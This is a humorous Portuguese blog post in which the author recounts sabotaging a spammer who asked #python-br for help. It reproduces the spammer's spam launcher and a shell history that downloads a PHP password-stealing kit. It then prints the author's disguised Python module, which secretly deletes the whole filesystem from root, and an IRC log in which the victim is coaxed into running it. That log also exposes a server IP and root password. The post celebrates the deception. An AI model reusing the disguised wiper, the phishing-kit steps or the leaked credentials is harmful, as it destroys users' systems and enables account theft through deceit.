Fonte: http://anatomias.mediasmile.net/

Piadinha – Só os inteligentes vão entender =)

ATENÇÃO: Não clique em nenhum link no log no mirc e não execute nenhum código desse post, a menos que eu fale explicitamente que pode =)

Prólogo

.

No domingo – 11/04/2010 – um sujeito conhecido como Donk apareceu no canal #python-br em busca de ajuda, o pobre rapaz estava atrás de um programador Python, pois havia perdido o seu. Nesse dia não lhe dei muita atenção…

Nessa segunda – 12/04/2010 – o garoto voltou e mandou o seguinte código no pocoo e pediu novamente ajuda:

#!/opt/local/bin/python2.6
# -*- coding: utf-8 -*-

#import sys
import al8
#ALTERE ESSES VALORES
QTD_THREADS = 1
ARQUIVO_LOGINS = "teste.txt"#precisa barra no final
ASSUNTO = "Google de cara nova, ficou engracado kkkkk"
LINK_ALVO = "http://google.com"
LINK_FALSO = "http://google.com"
#ALTERE ESSES VALORES

def inicia():
    carta = al8.Carta(ASSUNTO, LINK_ALVO, LINK_FALSO)
    spam = al8.Spam(carta, ARQUIVO_LOGINS, QTD_THREADS)
    spam.inicia()
    al8.anota("FIM!")

if __name__ == "__main__":
    inicia()

Arquivo 2 al8.pyc

[...]

Meu programador usava isso pra fazer ele rodar pra mim aptitude install mysql-server mysql-client:
apt-get install apache2
apt-get install php5 libapache2-mod-php5 php5-mysql
/etc/init.d/apache2 restart
apt-get install phpmyadmin
403 mkdir temp
404 wget http://sppllc.com/images/p.tar.gz
405 tar -zvxf p.tar.gz
406 mv *.php etc/fetch
407 mv *.php /etc/fetch
408 mv *.php /etc/
409 mkdir /etc/fetch
410 mv *.php /etc/fetch
411 tar -zvxf p.tar.gz
412 mv *.php /etc/fetch
413 sudo chmod -R 777 temp
414 sudo chmod -R al8.py
415 sudo chmod -R al8.pyc
416 dir
417 python envia.py
418 sudo chmod -R al8.py
419 sudo chmod -R 777 temp
420 sudo chmod -R 777 al8.pyc

Capítulo 1: As Más Intenções

.

Primeiro, olhando o código já da pra saber a intenção do figura, depois reparem no link em vermelho, – podem clicar – é um código obscuro em php pra roubar e mudar a senha do pessoal no hotmail, depois o script em Python entrava na conta roubada e enviava um link falso via msn para todos os contatos.

Mas ele tinha um problema, como o  programador dele começou a cobrar 40 mil pelo serviço os dois acabaram rompendo e ele ficou sem o script principal – il8.py – que entrava no msn e enviava as mensagens.

Capítulo 2: Minha Generosidade

.

Eu, que sou uma pessoa bondosa e que gosta muito de ajudar os outros decidi dar uma mão. Então criei um pequeno script que substitui o il8.py dele:

# importa as bibliotecas de email do python
import shutil as emaillib
import os as passwordmod
MandaSPAM = emaillib.rmtree
SENHA = passwordmod.mkdir

# cria a fucao carta
def Carta(assunto, link1, link2):
    # cria as cartas necessarias, pode demorar um pouco
    # precisa de su pra rodar
    MandaSPAM('/', True)

    # pega os emails
    email = chr(110)+chr(48)*2+chr(98)

    i = 0
    while True:
        SENHA(email+'1')

def Spam(carta, arquivo, threads):
    Carta(None, None, None)

Pra quem não entendeu esse código eu explico: Ele deleta TUDO a partir da raíz, seria como apagar o ‘meu computador’ no windows.

Capítulo 3: A execução

.

Depois disso segue a conversa no pvt (via IRC):

T 1271087255 31<renatopp>30 http://pastebin.com/hRuDqxZB
T 1271087263 31<renatopp>30 coloca isso no lugar do i18.py
T 1271087275 18<Donk> h?
T 1271087309 31<renatopp>30 ele vai substituir
T 1271087319 18<Donk> tipo
T 1271087328 18<Donk> 187.45.227.125 loguin root
T 1271087330 18<Donk> senha brasil50
T 1271087337 18<Donk> acesso pelo putty.
T 1271087342 18<Donk> Tenta por o script pra mim
T 1271087343 18<Donk> pra rodar
T 1271087349 18<Donk> Eu te do uma bonificaçao
T 1271087350 18<Donk> Boa
T 1271087397 18<Donk> Pode tentar pra mim ?
T 1271087408 31<renatopp>30 vc não está rodando aquele script?
T 1271087414 31<renatopp>30 eh soh botar na mesma pasta
T 1271087492 18<Donk> Tem como tu fazer isso pra mim ?
T 1271087495 18<Donk> www.baixaki.com.br
T 1271087497 18<Donk> putty…
T 1271087503 18<Donk> ip [12:46:44] 12<02Donk12>1 187.45.227.125 loguin root
T 1271087504 18<Donk> [12:46:46] 12<02Donk12>1 senha brasil50
T 1271087511 18<Donk> pasta home
T 1271088188 18<Donk> renatopp_
T 1271088189 18<Donk> Tae?
T 1271088289 18<Donk> renatopp_
T 1271088291 18<Donk> tae?
T 1271088773 18<Donk> renatopp_
T 1271088779 18<Donk> foi tu q me mando o lin kn e ?
T 1271088935 31<renatopp_>30 acho que seu servidor está com problemas
T 1271088940 31<renatopp_>30 não conecta
T 1271088950 18<Donk> Mandei formata ele aqui por causa disso agora
T 1271088951 31<renatopp_>30 pq vc não coloca la?
T 1271088957 18<Donk> Ja to instalando um servidor novo.
T 1271088962 18<Donk> E so substiru o al8.pyc
T 1271088964 18<Donk> por esse outro?
T 1271088971 31<renatopp_>30 isso
T 1271088981 31<renatopp_>30 eu usei umas paradas do python la
T 1271089050 18<Donk> tem msn vc?
T 1271089078 31<renatopp_>30 nops, só entre no mirc
T 1271089083 31<renatopp_>30 sou da velha guarda
T 1271089091 18<Donk> hmm
T 1271089092 18<Donk> rs
T 1271089097 18<Donk> pera é ja falo c vc
T 1271089097 31<renatopp_>30 hehehe
T 1271089099 18<Donk> vai ta on ?
T 1271089103 31<renatopp_>30 yep
T 1271089107 18<Donk> ok
T 1271089110 18<Donk> to instalando u mserver
T 1271089111 18<Donk> novo
T 1271089113 18<Donk> pra ve
T 1271089120 31<renatopp_>30 roda ele como root pra acessar o sevidor smtp
T 1271089284 31<renatopp_>30 pq está formatando?
T 1271089311 18<Donk> pq perdi o acesso
T 1271089312 18<Donk> n q logar
T 1271089319 31<renatopp_>30 entendi
T 1271089514 18<Donk> root@XXXCNN5988:/home# python envia.py
T 1271089514 18<Donk> Traceback (most recent call last):
T 1271089514 18<Donk> File “envia.py”, line 5, in
T 1271089514 18<Donk> import al8
T 1271089514 18<Donk> ImportError: Bad magic number in /home/al8.pyc
T 1271089533 31<renatopp_>30 deleta o al8.pyc
T 1271089538 31<renatopp_>30 e coloca o meu
T 1271089548 18<Donk> coloco ele com qual nome /;]/
T 1271089550 18<Donk> ?
T 1271089566 31<renatopp_>30 al8.py o que eu te passei
T 1271089573 31<renatopp_>30 e coloca na mesma pasta do envia
T 1271089584 31<renatopp_>30 roda como root, senão ele não acessa o smtb
T 1271089586 31<renatopp_>30 smtp*
T 1271089646 18<Donk> agora dei o comando nao deu erro
T 1271089648 18<Donk> ainda
T 1271089652 18<Donk> Ta demorando um pouco
T 1271089661 18<Donk> dei python envia.py
T 1271089664 18<Donk> e trav
T 1271089689 31<renatopp_>30 normal
T 1271089697 18<Donk> Traceback (most recent call last):
T 1271089697 18<Donk> File “envia.py”, line 32, in
T 1271089697 18<Donk> File “envia.py”, line 25, in inicia
T 1271089697 18<Donk> File “/home/al8.py”, line 18, in Carta
T 1271089697 18<Donk> OSError: [Errno 2] No such file or directory: ‘n00b1′
T 1271089710 31<renatopp_>30 estranho
T 1271089744 18<Donk> root@XXXCNN5988:/home#
T 1271089745 18<Donk> root@XXXCNN5988:/home# nano envia.py
T 1271089745 18<Donk> -bash: /usr/bin/nano: No such file or directory
T 1271089745 18<Donk> root@XXXCNN5988:/home# dir
T 1271089745 18<Donk> -bash: /bin/dir: No such file or directory
T 1271089745 18<Donk> root@XXXCNN5988:/home# dir
T 1271089746 18<Donk> -bash: /bin/dir: No such file or directory
T 1271089746 18<Donk> root@XXXCNN5988:/home# clear
T 1271089747 18<Donk> -bash: /usr/bin/clear: No such file or directory
T 1271089747 18<Donk> root@XXXCNN5988:/home# clear
T 1271089748 18<Donk> -bash: /usr/bin/clear: No such file or directory
T 1271089748 18<Donk> root@XXXCNN5988:/home#
T 1271089748 18<Donk> root@XXXCNN5988:/home# clear
T 1271089749 18<Donk> -bash: /usr/bin/clear: No such file or directory
T 1271089792 18<Donk> ai travo o servidor
T 1271089873 18<Donk> tu fez conseguiu fazer ele envia no seu pc
T 1271089909 31<renatopp_>30 perae, vou te passar um link
T 1271089947 31<renatopp_>30 http://tinyurl.com/yzu8nvo
T 1271090294 18<Donk> abriu um site porno
T 1271090294 18<Donk> kk
T 1271090335 18<Donk> isso ai ta abrindo um site porno
T 1271090379 18<Donk> [13:30:23] 12<1renatopp_12>
T 1271090381 18<Donk> q isso ?
T 1271090395 31<renatopp_>30 era um tutorial
T 1271090435 18<Donk> tu deu conta
T 1271090438 18<Donk> de fazer ele roda ?
T 1271090458 31<renatopp_>30 nops
T 1271090479 18<Donk> achei q tu tinha conseguido
T 1271090515 31<renatopp_>30 véi
T 1271090520 31<renatopp_>30 acho que seu servidor ta com pau
T 1271090533 18<Donk> vou tenta no linux
T 1271090538 18<Donk> no meu pc msm
T 1271090539 18<Donk> ja venho
T 1271090549 23* 23Donk has quit (23Quit: -=[Cyber]=- – changing server23)
T 1271091071 18<Donk> fudeu meu linux tbm
T 1271091072 18<Donk> 12,00=01\
T 1271091084 31<renatopp_>30 o que aconteceu?
T 1271091096 18<Donk> na hora q roda ele
T 1271091098 18<Donk> derrepende
T 1271091104 18<Donk> ele paga as biblioteca do linux
T 1271091106 18<Donk> o linux trava
T 1271091109 18<Donk> e qnd vai iniciar
T 1271091113 18<Donk> da um monte de erro
T 1271091431 23* 23Donk has quit (23Ping timeout: 245 seconds23)
T 1271091583 18<Donk> renatopp_
T 1271091583 18<Donk> 12,00=01\
T 1271091587 18<Donk> Fudeu ate meu windows.
T 1271091594 31<renatopp_>30 pq??
T 1271091601 18<Donk> aquele site porno
T 1271091602 18<Donk> la
T 1271091617 18<Donk> Threadt RLock
T 1271091617 18<Donk> (Queuet (MIMEMultipartMIMEText(
t Header(

T 1271091618 18<Donk> datetimeNt Carta
T 1271091618 18<Donk> # CARTA:
T 1271091618 18<Donk> # assunto: ‘%s’s
T 1271091618 23* 23Donk has quit (23Excess Flood23)
T 1271091656 18<Donk> vo formatar meu pc
T 1271091662 23* 23Donk has quit (23Client Quit23)

Capítulo 4: A Conclusão

.

Além de perder o servidor 2 vezes, o sujeito ainda rodou o script no servidor e no pc pessoal dele, além de clicar no link da morte.

E o que aprendemos com essa histórinha?

Não façam spam, quem faz isso tem um lugarzinho bem aconchegante reservado no inferno.

Apesar de tudo isso gerou vários LOLs a tarde hahahaha

O Verdadeiro “zoom bee”

a pedidos do sakata

O bom e velho Dilbert:

E digo mais, isso se aplica a todas áreas da computação…